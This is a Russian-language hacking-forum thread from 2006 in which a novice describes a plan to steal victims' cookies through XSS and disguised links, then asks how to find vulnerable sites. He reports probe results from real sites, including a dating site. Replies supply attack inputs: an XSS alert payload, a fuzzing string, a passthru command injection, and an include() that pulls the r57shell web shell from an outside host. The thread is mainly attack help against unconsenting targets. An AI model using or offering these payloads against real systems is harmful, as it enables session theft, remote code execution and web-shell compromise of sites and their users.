Xss — ANTICHAT Forum

Xss

01.07.2006, 18:04

KrikSta

Новичок

Регистрация: 01.07.2006

Сообщений: 5

С нами: 10453149

Репутация: 0

Xss

Привет все! У меня вопрос надеюсь ответите! Я много прочитал инфы с разных сайтов про Xss и как воровать куки! Уяснил для себя что надо сделать следующее
1) Зарегистрировать хостинг с php
2) Закачать туда скрипт для кражи куков!
3) Потом дать жертве ссылку на свой скрипт, ну и ссылку желательно "замоскировать"
4) потом с помощью проги (cookieeditor) использовать куки в своих целях!
Теперь вопросы с вашего позваления!
Я так понял что жертве можно дать ссылку (через javascpirt) если на сайте есть Xss уязвимости!
ОСНОВНОЙ ВОПРОС !!!!!!!!! КАК САМОМУ И ИМЕННО САМОМУ МОЖНО НАЙТИ ЭТИ САМЫЕ XSS УЯЗВИМОСТИ НА САЙТЕ! МЕНЯ ИНТЕРЕСУЕТ САМ ПРОЦЕСС ПОИСКА ЭТИХ УЯЗВИМОСТЕЙ!! С ЧЕГО НАДО НАЧИНАТЬ И ЧТО КУДА ПОДСТАВЛЯТЬ? я прочитал много faq по xss, но везде написано что можно сделать если есть XSS уязвимость а КАК ЕЁ НАЙТИ САМОМУ НЕТ!!!!! ПОЖАЛУЙСТА ОПИШИТЕ ВЕСЬ ПРОЦЕСС НАХОЖДЕНИЯ XSS бага!! Или накидайте ссылок где можно прочитать!!! ОГРОМНОЕ СПАСИБО ЗАРАНЕЕ!!

𝕏 Twitter Reddit Telegram Копировать ссылку

01.07.2006, 18:25

s1z3r

Познающий

Регистрация: 23.05.2006

Сообщений: 55

С нами: 10510192

Репутация: 19

Накидываю сцылку - http://forum.antichat.ru/thread20140.html. Пержде, чем создавать тему или что-то спрашивать, сначала воспользуйся поиском, так как если поискать, то на форуме можно найти ПОЧТИ ВСЁ.

02.07.2006, 17:37

KrikSta

Новичок

Регистрация: 01.07.2006

Сообщений: 5

С нами: 10453149

Репутация: 0

Спасибо этой стать еще не читал
Кто знает где еще инфы надыбать кидайте сюда ссылки!!

23.08.2006, 18:15

KrikSta

Новичок

Регистрация: 01.07.2006

Сообщений: 5

С нами: 10453149

Репутация: 0

На одном из сайтов подставил :";!--"<fuck>=&{()} и он(сайт) выдал мне следующее сообщение:
Parsing error

:16: parser error : Unescaped '<' not allowed in attributes values
<param name='!--"<fuck>'></param>
^
:16: parser error : attributes construct error
<param name='!--"<fuck>'></param>
^
:16: parser error : Couldn't find end of Start Tag param line 16
<param name='!--"<fuck>'></param>
^
:16: parser error : Opening and ending tag mismatch: fuck line 16 and param
<param name='!--"<fuck>'></param>
^
at /home/mheart/cgi-bin/index.pl line 584

Что это значит?

23.08.2006, 19:30

hidden

Постоянный

Регистрация: 23.04.2006

Сообщений: 622

С нами: 10552646

Репутация: 1292

Цитата:

Сообщение от KrikSta

:16: parser error : Unescaped '<' not allowed in attributes values
<param name='!--"<fuck>'></param>

Тут скорее всего чтото вроде

PHP код:


		
			
eval('$x="'.$y.'";');

попробуй

Код:

ha".passthru("dir")."ha

или

Код:

ha".include("http://rst.void.ru/download/r57shell.txt")."ha

24.08.2006, 09:56

KrikSta

Новичок

Регистрация: 01.07.2006

Сообщений: 5

С нами: 10453149

Репутация: 0

Спасибо за помощь парни! Ответьте еще на один вопрос)))
На одном из сайте знакомсят есть раздел ТОП 100(ну там типа фотки самых красивых) когда я в URL подставил "><script>alert("XSS")</script> эти фотки исчезли, но сообщение не выкидывает? Это XSS уязвимость? Если да то почему не выкидывает сообщение?

24.08.2006, 11:09

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

С нами: 10762826

Репутация: 1348

Цитата:

Сообщение от KrikSta

Посмотри исходный код страницы, поищи слово alert, а там уже сам определишься. Не выкидывает сообщение, т. к. так задумано - отключены сообщения об ошибках. Может быть для отдельной функции (в php это делает символ @ перед именем функции, например @fopen()), а может быть для всех ошибок вообще.

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.